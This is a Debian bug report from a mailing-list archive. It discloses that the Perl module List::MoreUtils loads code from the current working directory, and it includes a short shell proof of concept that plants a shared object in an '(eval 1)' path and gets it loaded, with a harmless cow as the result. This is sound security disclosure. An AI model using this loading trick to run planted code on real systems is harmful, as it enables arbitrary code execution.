Bug#829138: liblist-moreutils-perl: tries to load code from cwd
Jakub Wilk
jwilk at debian.org
Thu Jun 30 21:28:51 UTC 2016
Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things
List::MoreUtils tries to load code from a subdirectory of the current
working directory. This could lead to execution of arbitrary code if
cwd is untrusted.
Proof of concept:
$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
(__)
(oo)
/------\/
/ | ||
* /\---/\
~~ ~~
..."Have you mooed today?"...
Segmentation fault
-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages liblist-moreutils-perl depends on:
ii libc6 2.22-13
ii libexporter-tiny-perl 0.042-1
ii perl 5.22.2-1
ii perl-base [perlapi-5.22.1] 5.22.2-1
--
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: moo.c
Type: text/x-csrc
Size: 127 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-perl-maintainers/attachments/20160630/38a8a960/attachment.c>
More information about the pkg-perl-maintainers
mailing list